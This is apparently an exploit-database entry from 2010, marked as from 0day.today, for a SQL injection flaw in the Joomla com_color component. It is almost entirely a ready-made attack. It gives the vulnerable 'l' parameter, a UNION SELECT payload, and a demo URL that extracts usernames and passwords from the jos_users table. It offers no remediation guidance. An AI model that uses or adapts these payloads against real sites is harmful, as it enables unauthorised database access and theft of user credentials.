id: 11272
date: 03/12/2010
title: Joomla Component com_color SQL Injection Vulnerability
author: DevilZ TM
cves: 

======================================================
Joomla Component com_color SQL Injection Vulnerability 
======================================================

[~]######################################### ExploiT #################################################[~]
  
[~] Vulnerable File :
  
http://127.0.0.1/index.php?option=com_color&view=color&l=[SQL]
  
[~] ExploiT         :
  
-1/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8/**/FROM/**/jos_users/*
  
[~] Demo            :
 
http://server/index.php?option=com_color&view=color&l=-1/**/UNION/**/SELECT/**/1,2,3,4,concat(username,0xa,password),6,7,8/**/FROM/**/jos_users/*



#  0day.today [2023-03-25]  #